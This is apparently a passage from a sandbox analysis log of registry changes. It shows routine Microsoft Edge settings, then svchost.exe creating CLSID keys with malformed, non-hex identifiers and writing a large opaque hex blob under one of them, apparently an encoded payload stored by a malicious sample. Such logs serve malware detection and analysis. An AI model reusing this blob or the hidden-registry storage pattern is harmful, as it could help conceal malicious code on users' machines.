jiao 0094 jie 0095 jin 0096 jing 0097 jiong 0098 jiu 0099 ju 009A juan 009B jue 009C jun 009D ka 009E kai 009F kan 00A0 kang 00A1 kao 00A2 ke 00A3 kei 00A4 ken 00A5 keng 00A6 kong 00A7 kou 00A8 ku 00A9 kua 00AA kuai 00AB kuan 00AC kuang 00AD kui 00AE kun 00AF kuo 00B0 la 00B1 lai 00B2 lan 00B3 lang 00B4 lao 00B5 le 00B6 lei 00B7 leng 00B8 li 00B9 lia 00BA lian 00BB liang 00BC liao 00BD lie 00BE lin 00BF ling 00C0 liu 00C1 lo 00C2 long 00C3 lou 00C4 lu 00C5 luan 00C6 lue 00C7 lun 00C8 luo 00C9 lv 00CA ma 00CB mai 00CC man 00CD mang 00CE mao 00CF me 00D0 mei 00D1 men 00D2 meng 00D3 mi 00D4 mian 00D5 miao 00D6 mie 00D7 min 00D8 ming 00D9 miu 00DA mo 00DB mou 00DC mu 00DD na 00DE nai 00DF nan 00E0 nang 00E1 nao 00E2 ne 00E3 nei 00E4 nen 00E5 neng 00E6 ni 00E7 nian 00E8 niang 00E9 niao 00EA nie 00EB nin 00EC ning 00ED niu 00EE nong 00EF nou 00F0 nu 00F1 nuan 00F2 nue 00F3 nuo 00F4 nv 00F5 o 00F6 ou 00F7 pa 00F8 pai 00F9 pan 00FA pang 00FB pao 00FC pei 00FD pen 00FE peng 00FF pi 0100 pian 0101 piao 0102 pie 0103 pin 0104 ping 0105 po 0106 pou 0107 pu 0108 qi 0109 qia 010A qian 010B qiang 010C qiao 010D qie 010E qin 010F qing 0110 qiong 0111 qiu 0112 qu 0113 quan 0114 que 0115 qun 0116 ran 0117 rang 0118 rao 0119 re 011A ren 011B reng 011C ri 011D rong 011E rou 011F ru 0120 ruan 0121 rui 0122 run 0123 ruo 0124 sa 0125 sai 0126 san 0127 sang 0128 sao 0129 se 012A sen 012B seng 012C sha 012D shai 012E shan 012F shang 0130 shao 0131 she 0132 shei 0133 shen 0134 sheng 0135 shi 0136 shou 0137 shu 0138 shua 0139 shuai 013A shuan 013B shuang 013C shui 013D shun 013E shuo 013F si 0140 song 0141 sou 0142 su 0143 suan 0144 sui 0145 sun 0146 suo 0147 ta 0148 tai 0149 tan 014A tang 014B tao 014C te 014D tei 014E teng 014F ti 0150 tian 0151 tiao 0152 tie 0153 ting 0154 tong 0155 tou 0156 tu 0157 tuan 0158 tui 0159 tun 015A tuo 015B wa 015C wai 015D wan 015E wang 015F wei 0160 wen 0161 weng 0162 wo 0163 wu 0164 xi 0165 xia 0166 xian 0167 xiang 0168 xiao 0169 xie 016A xin 016B xing 016C xiong 016D xiu 016E xu 016F xuan 0170 xue 0171 xun 0172 ya 0173 yan 0174 yang 0175 yao 0176 ye 0177 yi 0178 yin 0179 ying 017A yo 017B yong 017C you 017D yu 017E yuan 017F yue 0180 yun 0181 za 0182 zai 0183 zan 0184 zang 0185 zao 0186 ze 0187 zei 0188 zen 0189 zeng 018A zha 018B zhai 018C zhan 018D zhang 018E zhao 018F zhe 0190 zhei 0191 zhen 0192 zheng 0193 zhi 0194 zhong 0195 zhou 0196 zhu 0197 zhua 0198 zhuai 0199 zhuan 019A zhuang 019B zhui 019C zhun 019D zhuo 019E zi 019F zong 01A0 zou 01A1 zu 01A2 zuan 01A3 zui 01A4 zun 01A5 zuo 01A6" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "You have selected %1 as the default voice." C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7b7f3bfc5ea7d701 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 109400bca8b8d701 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "202" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "22" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "40A;C0A" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 63a1ff0e5fa7d701 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "269" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6a64fa2d60a7d701 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ} C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}\650478DC7424C37C\1 = 01000000000000000000000000000000000000010100000000000000000000000000000064650136363535303034343737383844444343373734343232343443433333373743430000568937b9e80509faad94ffc48f88d247df004d17ca900303000004040000ff00ff00b8b8000000000000404000000000000000000000000000000000000000000000000000000000000000000000101101000e11a5b40eb4bdc4ec99b94d81ec753c011a5350021d0815130c4d43020f00011b5442074552071b4e49074e640b1c734d020b014b2300072e24000000000000ae4b815dd36e8e60806e8e60806e8e603446e391846a8e603446e193f51b8e603446e0928d638e60bb0bd36286698e60bb0bd5649b748e60bb0bd465917e8e60891f65f3856b8e60806e8f61e20c8e6017a7d968836c8e6017a7d061806f8e6012a22f9f816f8e6017a7d263806f8e60383b0a0b826e8e606a00000000000000000000000000000000000000000000005015450064e28107b8495ccd6000000000000000f0f022022b090c0e00acac0000c8c80000000000d4f5210000101000000000808101000000101000000202000505020200000000050502020000000000b0b10100040400000000000202606101001010000000000010100000000000000010100000000000101000000000000000000010100000a0e647015c5c0000fcba47013c3c000000909101e0e1010000707101bcb10d00000000000000000000a0a10124220600f0c43501383800000000000000000000000000000000000000000000000000003005340194940000000000000000000000c0c000888a02000000000000000000000000000000000000000000000000002e5a111d0c740000802bab000010100000acac0000040400000000000000000000000000202000604e5c1605151561008a058f0000c0c0000090900000b0b000000000000000000000000000404000406e4a051515610000f0ec1c0000505101000a0a0000404101000000000000000000000000404000c0ee5e140515156100bcb10d0000707101000e0e00004a4b01000000000000000000000000404000406e49010f0d177300b0b00000008081010002020000585901000000000000000000000000404000406e5c010111630000e0e101000090910100020200005a5b01000000000000000000000000404000406e5c1709030c63002422060000a0a10100080800005c5d0100000000000000000000000040400042420000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fb8b648f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f6434acb42c364e345b59182e5ba09450a19e5fa7b7a0d0d77b8e6554ccb42c54176f3a6e357a61c67105b44008dcfddf9e57bfd736398cffdd9e57bfd737a6ae579ca42697de579c34e6254be3f88cb42c343c27bd0574737b8a677e357a7b88cc27bd05d5f25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000000000c3b8b649c35a98f3ba2626000101000066e345b4687ae57bd8576119b8778946ac61b17e02b8f5404acb41c064e345b591ebb8b531faafe57bc93e8a1f9a0000444bb8f5404acb41c06423c045cf8b4bce010049f0464141fcfc0808fc0c101f41cccdffd9e57bc14e7e06b8778946ac62b37c6827c27bc943524627c27bc14e6ee63e89cb41c0817adb2d801d930100444bb8b56423c045b5b34bcca6647bf10688fb7d01000fb8b564e345b45240f6f6e57bd82f88ef6901000fb8778946ac61cd8cd85a01000fb8f5404acb41c064e345b5a964b9010000c3a5e57bcb3c8a13960000444bb8f5404acb41c06423c045cf8baf2a010049f0464141fcfc0808fc42cccdffd9e57bc14e7e06b8778946ac62b37c6827c27bc943524627c27bc14e6ee63e89cb41c0817adb2d807ef10000444bb8b56423c045b5b34bcca6647bf106885cdb00000fb8b564e345b451b5f6e57bd82f884fc800000fb8778946ac61cd8c38bb00000fb8f5404acb41c064e345b5a964bb030000c3a5e57b9a6d8a1b9e00000fb8f54064e57b9b6c8a159000000fb8f5464ccb41c460e57bc93e8afb7e0000444bb8b56423c045b40035f8444341fc42cccddff9e57be16e7e06b877814eac62b36350cccd90b6e57bf17e6b7a27c27bc94561ea3e89cb41c0817acb4d407b4bb8b56423c045b5b2447adb5c4e3fb8b564e345b4564469105b440066e57bd8576b13b8778946ac61b1601cb8f5404acb41c064e345b5915cba020000c3f0f3030f00000000000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b96e1cc5c748770d77b8a65476f3a6e357a61924f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bd95e4737b8a677e357a7b88cc27bd9545f25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b9483ac5c748770e74b8a65476f3a6e357a60439f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bda5d4434b8a677e357a7b88ccccda86b7bf27d5d25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b97e0cc5c748770e74b8a65476f3a6e357a60439f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bda5d4434b8a677e357a7b88ccccda86b7bf27d5d25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f0000000000008c15031ec96df419010048c38eba853b01487bf78cc10da02401010041be3780c362a8c27bfe098807800000492aa38cc1889f701500beca070cec741800494acb371ea9c5b8133b1c01ebdf7cc5b858701c01ebc063c5b8f1d91c01ebc96ac5b83e151f01ebf251c5b8577c1f01ebfb58c5b89cb71f01ebec4fc5b8c5ee1f014cc7599ac34d8a67fdd9109f80000000444bb8bf4e49b8b314556ee3bd7c41cb43c247c045b59cacc04cbc576ac34632ea2e91aa0083bec9b64301324f7bf9fa1d4e5701b8b9010000e9a84302000fb8b54ac135986441010033cc38c2ce8943010101000089b4cca4540166e345b45864f1b9262600010100006669105b440066e57bd8576119b8778847ac62b27e02b8f5404acb41c064e345b591a0cf4483c74c8ef3bb212000010100000f105f400fb8bd6ce57ad957655b46ac69b97f6ae57af07c6d51ca7b9b1e6f5acb41c06424cbc5087471be3e88b63f2b389a2aa2894bc38875f5c800000f8c44c60100665f04a7ce550148c115b81c3901004cc53d906c4901004cc1b8660654014cc53598341101004cc1b04920550166eff578343f8b1d990000665f040f6754010f8b088c00004cc1c9601479c24c8a66ec579fb8a7524db8bb0c2bfaa47d40cb43c2874cbc996957a61c2071041c755501742be6b9080800e88d6207008b86eab3550148c5985d531a0189c568046dc64586c34385c64c8fc35327ea2799ab004cc78eeeb8520148c3586ab801000041beaf1008c34023a35e150089b494fd550166efb4e789520166efb49ef755010f101f0fb8f3780c5624cb8d3b77c5f27d64e345b598a1c737983411010048c3458267ddf9b8b66727c88d0a46c5c44b64e345b59aa7c34632ea60dda800ffeab20daa004cc73f906c49010048cb4b37f0101f66e5ff3a440248c5cd41748179894147020000b9bb020000482b9bb0c35c28ea318ca80048c35390cd45b4023ec34337ea368ba80048cd45b41c24c74c8fc35d9ec3432030439b0048c34034ea1aa7a80048c3586ab40d0000ffea5ce3aa0048cd45b441cafadb8d5201b8b901000048c317b81c39010048c337986441010048c307a824010100487bff249972030048c945dc1901005e039e8bc34034eabb09a70033f32b222169850400ccbf6615007c691500859015008e9b150097821500a0b51500a9bc1500cc0000000000000084cb6fc41bfa36eab905a9008545cf8bc6430100b9b40d000048c1d57804dfead16da9008545cf8b94110100b9b40d0000ffea8c30a90048c35390cd45cf8b8c09010048c34337ea299ba7004cc75390cd45cf8b77f3000048c34320f8e708007a45b45762f9bc04000049c2589bc34023c3d7030000ea50eca90048c3d7780413f388cb47eceb8ac24023392806007a45b45762f9bd05000049c2589bc340231407040000ea03bfa90048c3d7780413f388cb47eceb8ac240238a9805007a45b45762f9be06000049c2589bc340232536040000eaf24fa80048c3d7780413f388cb47eceb8ac240231b0905007a45b45762f9bf07000049c2589bc340237665040000eaad10a80048c3d7780413f388cb47eceb8ac24023fce30800bbcf4b89c2589bc340239e8d040000ea8538a80048c3d7780413f388cb47eceb40be30323e01324f7bf9fa34635301ffea7ac7a80048c3d7780413f388cb47eceb0f00008c171fcb6fdc03cc38c2336750010101000033e15bb43f50530141f970c8000089b4cfa3500148c5802e725001c7c21044500101010000c7c2aa913f01f4f50100e8926f150033e19ac580dc80500141f970c80000e88e73150048c1d57864d078d3c501007ebc90fc5001e8eb03000f811c920000487104f99451017402105f04f69b510174190b5f04afc350017410ddb9080800e81ef503008b86752950014cc1807428500189c568046cc1889bce510148c34380c598d1d3160148c35327eaae1ca7004cc78e7124510148c3586ab801000041beaf1008c340233cc5110089b40f63500166efb45e33510166efb4117d5001b94df5010089b4204c50018984e6d63c01ebed8d86eede3c01ffeae859a4003904127f51010f8ac4be0000b7c3d7786473f349b41d70510148cb47f46f9c0f0000000000000000000000000084c184f4b64e0133f3030f000000000084cb6fc4abbeccbe4e0101c6c2e6ac4e010000000075687b69109b8400000000b94df50100ffea8031a40083bef7854e0101759855dd640000ffea9425a40033f388cb47eceb0f00000000000000000074b90100003beba57e438fc289c34e0100000000c30f00000000000000000000000000000000aa0069109b8400000000487336340d3501f287675a8900d17691363e000d8777f0318b8908d9f9de370000cc00008c131bcb6fcc68c352eafa36ea66d7a40048c34034ea77c6a400ffea79c8a40048c34372b30d04c088cb47e47b13b7da45c4a40048c1c5682c40cb6fd481ae170000e83b4695008545b473bebb020000cde461c580fece3c01e822cb010048c3cf601c70c18cdfe43f0148c5c9601c70cb43c840c18c6f543f0148c38ec6fd3f0148c18c31093c0148c3cf606408c18c3d063f01c7c20b333c01090d04c007c20d353c0101010000c7c2172f3c0101010000b8b00800004823abc048c58007373c01488fc30503020000b8b00800004823abc048c3864f71320148c1c5482498b00800004823abc149c3863806320148c1c5482468c5803c97a600e8e8ff0000b7cb47fcfb0f000084cb6fc491b1080000e8ee06000048cb47eceb0f45c5682c40cb6fc491ae170000e8047894008545b47c83cf6014bb4305e461c58006363c01e89a72000048c3cf600c60c18cf7cf3c0148c5c9600c60cb43c840c18c87bf3c0148c38edee63c0148c18c49703d01c7c2370e3d01090d04c007c229103d0101010000c7c2330a3d0101010000b8b00800004823abc048c58023123d018bdf701478c19d1549c58072daa500e8a6b00100b7cb47eceb0f84c1d57804771fcb6fac08c35226ea8c3ba20048c33043f8000048c5d9707418c3448a76f33fea9c2ba20048cd45b4467acbe7401c3848c5c1687c10c3df70741cc74380c1c568147cc74c8fc5c1684428c1c5680c1bfa81c1d57804dfea4ff8a20048c3d7784c20cb47841f9c0f00008c1305011fcb6fac08c35226ea3e89a20048c3384bf8000033ccba76f388c5d9704428c34531ea0cbba20048cd45b44d71cbe7401c3848c5c1684c20c3df70442cc74380c1c568147cc74d8ec5c1685438c1c5680c1bfa81c1d57804dfeaff4ba100ff38447cfd7ecdf9cb47841f0105980f0000257e940300cc000084cb6fc4ad57a64dba69eb755cab69eb75629579fb757eb2b901000048cb47eceb2bb25e0400ebeeedc32f04000fb97688cb47eceb8ac25b98cb47ecc1e60f00004dc845cf9a5489cb47ecc1c52d010048c1d5782c40c1fd503458c1f5580461171ecb6fcc68c379bec77ac2fa2126ca04008444b57234f32901e80000e8a64d03008a5250cc606400f7b682bed3d13e0100747eb3be070000e8fa1a0800c7c2dde73e0101010000e87b9003008444b4138faa4b090048c5808a8e0900e83ad40600e87996070048c580979d0700e829c70600e844ab070048c59874c2a30048c5803799a300e851a31a008545b55cc1f01b03008444b45468c5980cbaa30048c58007a9a300e8c93b1a00c7c26e543e01020200004072cd7541233dd0050040c47bf08acbb10000179b74070048c35390cbbb3874506cc34320f21f05008444b46c50c39053c34023ab4a09004cc74d7cb802000049c245312c2cfa1d273e01b8b901000048c3d7781478c3ff501c70c3f7586c00cb47e4611f9d0f84c1d5782c40c1fd503c4f1fcb6fcc60ca7b7a8ee1da3f0133e85e45bf7b37f32bbbaf37418cd7ec3f01e8cd27020040ca7270cc601cbbbefaf93f0102767eb3be070000e803ed0600e8da3103008994ad8e3f01e8bf54030040ca4527ff12050033e192ca4426d93405008444cf9a5648488bc3d7781478c3ff506408cb47e47f9c0f0084c34f8cc1d1786cc5c95891d94058c1c1405e0116171ecb6fac09c27b7b71b6c77a7457a77a362c59723f017f7834f3295bb200008dcfbd7c7bf9765dc25eb600008b5351cd6014b545cf8b098d00004cc74d4d5c9ec245264b5e0200745351cd6014b545b4023ac74d4d5c9ec245267c6e0500745351cd6014b37cfe745eae45b5526bc74df5e19bc2452690820500b3c74df5e19bc245268b9e0200b3c74df5e19bc24526a64e0000857a8b71867cfc765f66c74d4d5c9ec24526a8bd0200745351cd6014b545b4675fc74d4d5c9ec24526c92100008b5351cd6014dbed35e852d57814bb488bc3d7785c30cb4784011f01019d0f000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc68c3969824a10049c2737379bac362a1cd5eae7088ce42eaf95ac340238b6407004cc74c4c5d9ec346322c9bc3d7781478c3e7481c70c3ff506408cb47e47f9c8bc1d5782c40c1fd5034471fcb6fcc69c273735192c37a7279fb7470edd73b04004cc74c4c589bc34586c3d7781478c3ff501c70cb47e47fb69e89010033000025b6471800cc00008c131bcb6fcc68c35232ca69c34023b14118008545b5675acb78048a72efba5a0800ebeeedc323080048c3402347b7180048cd45b4a19dcb47e47b988bcb6fc4c0db390a008545b455442dc38f211530000048c3c340e3ee4d73f3bc6027f330b847bebc81b03d01759bdcf288cb47eceb73b1ea1c3b000084cb6fc4c01ffe09008545b473eff6160800ebf2f137d609008b4320986e1e008545b47036f22becef1fd62100b0b149cb47eceb8bcb6fc41bfa21a94001008444cf9a5588cb47eceb0f000084cb6fc4c0cf2b0c008444b57136f22bf9fa4a8527008444b572efcd290c00eb075cb149cb47eceb8bcb6fc4c073bc2700e8e6020c00b0b149cb47eceb0f000084c1d5782c40c1e5483458c1fd503c4f1fcb6fcc69c272b0c27b7b5192c36201b85909008545b5629478fa74675ac344272bc605004cc74df5e19ac34632289fc3df707cd3c7687418c3d7781478c3e7481c70c3ff506408cb47e47fb66a941700cc000084cb6fc4c0ef0e09008545b46458c5808dbb3a0148cb47ecc10ec32400e8be4d1b008545b570edd92a1b0048cb47eceb8bcb6fc41bfa21f936270048cb47ecc1799b0b0040131bcb6fcc2fb9b376483a01854c72ba0100000f4b874b8d66583a01e832dc0600e805e70a008444b57136f22bfffc60ae26008444b57c3afa21d93a0b00eb0160498bcb47e47b980f000084c1d5782c5d1dc367a4cb6faccb525a7af80e8821a60000e88b6b08008545b45fae5eae526fc580d5e23b01e8975b24008545b47036f22b9132c580d1e63b01e8834f24008545cf9b542b8c2fc39e8cb22a0149ca4b3774497bf94000008363df14e378b1489a1b847ff18ec5cca5acc5ccade71f55a5acc5ccb502fd1f5dbdff1e1478473b014cc5cca5acc5ccade71f55a5acc5ccb502fd1e1c784f3b01f2fd1f5dbdff1e14744b3b01f2fd1e1c74433b0148c3d7787418cb47841d9e7abc050000e8b45e0200cc00000084cb6ff454c74a79f5175a00665f3c08d624008a0c312b66459b2400b7c598e8272500b7c5811c91b869154500752ae7b3090200665f78596d211867e9cdb8f6555cc5dc49504bd3dfb8f6474ec5818cccc181c682c19d306d72eaa56c93c1464077fab37881c94a0bc28d77fbb27a40cb41eac334ece19acd57a77136f22bff97f95e247d7936f22be1bab1eaed34f22be930f288cb47dcdb0f00008c131bcb6fccaa5331e30c070033e15745b47f8f5fae724fcf92634f380148cb47e47b9883131bcb6fcca0bda6a23801008a53ad708056a77b844123e82525008a41239d7c0900b0b149cb47e47b980f8c131bcb6fcc68c39e320d2b0148c3525241827b26260a38018362de779b1982cb79058a7f42c34023975d2200ebe447c3589bc5801e2a3801e812d8220033fa4c4588474b8f83c34a89cb47e47b980f84cb6fc4c04f580000b7bf2fc3db372f273780cb47eceb0f84c1d57804751dc367a4cb6fcc68cbe67d1848f389907df2b4b22b0048c38eac8028014873f8b61a27c5c055e7ea2fa09a0048c3ce5d50c1cc55efea31be9a008b4b88797455efea058a9a008b4b88c5c06d68797455efeaed6199008bce6568c5c05d588921c0687b7665687b7655587bf289f1460000000000ff00486be289f18a917df2b4b22b004873f88b474b8589c18c301c280148c3d7786c00bf2798c18c2b07280148cb47e47d9e8bc5806451390148b7da9f239900cc0084c58054613901e98564080048c58858653901c38bc58858653901c38bcb6fc4c00f180000b7cb8b0cec0e190000b7cb8b0a4acb47eceb0f84c588b4f44401c340a61c01390100c38bc1d5782c5d1dc5218864bb0400b7c96d2cc505008b5260ae170000e84d2f8a008545b4708f4006e4aaa62d3039010048c5c0bdc3e193f968d40400e8df3f080048c5c0bd0fead05d980048c31675e8000048c5184ddc040048c3408e76f33feaa62b980048cd45b44874cbe7401c3848c5006de4040048c31e4ddc04004cc74380c1c568147cc7488bc50065ec040048c1c5680c60c5c0bdb8c1c5680413fa36ea6fe2980048c30e4dcc040048c5c1687418c10c6de8000033e19ac5084dcc040041f92098000048cb43c840c10c0d880000e848a7070048c30e4dcc040048c1cd6044a7836074451500408783607055010000ffea6be69800837bf949c5c9607418c1cd606408c5c8b5ff9b578bc1cd606c7bfa36ea008d980048c5c16864bfea179a98008545b57ffc2dc0dbe1240133360148c317b8f4d5050048c94504c505005d9e0f000084c1d5782c40c1fd5034471fcb6fcc68c5901718130148c5b836111301ebfd5ec3b073cd7a8b7e42c3442781690000ff289fcb40cb4073e5ac97adc3d7781478c3ff501c70cb47e47f9c0f0084c1d5782c40c1fd5034471fcb6fcc68c590d3df100148c5b8f2d61001ebfd5ec3b073cd7a8b7e42c34427f51d0000ff289fcb40cb4073e5ac97adc3d7781478c3ff501c70cb47e47f9c0f0084b7da4cf09900cc8c131bcb6fcc68c35291c3498ac580f064990048c18243c5de5b3bfa81c18342c1c34240c5c540e0ec0c080048c58808979a0048c18a4bc3488bcb47e47b980ffff388c1c85158c58806999a0048c1c84940c588ed71990048c18849c34a020f8c131bcb6fcc68c35291c3498ac5809004990048c18243c5de5b3bfa81c18342c1c34240c5c540e04ca3070048c588d04c990048c18a4bc3488bcb47e47b980ffff388c1c85158c588ce52990048c1c84940c588b529990048c18849c34a020f8c131bcb6fcc68c35291c3498ac58030a4990048c18243c5de5b3bfa81c18342c1c34240c5c540e0ac43070048c3488bcb47e47b980f000084c5881488990048c18849cb42c9e15cb20700cc84c1d5782c5f1fcb6fcc68c588f66b980048c372b1c1888a5192cb42c9e07a950700f635c27579b7a218000048c34427ac46020048c34c8fc3d7781478cb47e47f9c0f0084cb6fa400c5c16804c80a1c0100b7c59836381a0148c5c16804c8917e0700cc84cb6fa400c5c16804c8cadd0000b7c5989e901a0148c5c16804c8b15e0700cc84cbfa710848c588811c980048474a0449cb0f0084c1d5783458c1f5583c4d1dc367a4cb6fcca3e68de833fafaf307c231112401020200000fade6cf4a06c22404240101010000817092220c0900cf418ecf5993c070940b1a1d28c0739b070b2c08c0719e1a1109294edb94cf509fcf8e4a7b350141c072b234011c2d4ed25258974fd25873b5220b1b46fa4273bc4fd96ab90100000fad2bccb5b4cf428dcdc4b5734341d4a97ddca9b9c057a7271acb8eb49d2501ffbec24bcc21d5cfc0f04bcd8cf8ce32013dfdc60701745c155d66040274551c4d760402746e1fb54905037c7bd8576c53f3ba010101010100004847ac60b0784ac2